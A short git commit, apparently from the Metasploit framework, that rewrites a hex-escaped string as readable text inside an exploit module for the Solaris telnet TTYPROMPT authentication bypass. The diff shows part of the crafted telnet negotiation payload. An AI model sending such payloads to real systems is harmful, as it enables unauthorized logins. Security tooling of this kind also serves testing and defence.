* blobs of hex strings suck.

git-svn-id: file:///home/svn/incoming/trunk@3444 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
bmc 2006-01-25 21:23:26 +00:00
parent 29dc84ee3e
commit 6b1e9648be
1 changed files with 1 additions and 1 deletions

View File

@ -67,7 +67,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
"\xff\xfb\x27" +
"\xff\xfb\x00" +
"\xff\xfa\x27\x00" +
"\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54" +
"\x00TTYPROMPT" +
"\x01" +
Rex::Text.rand_text_alphanumeric(6) +
"\xff\xf0"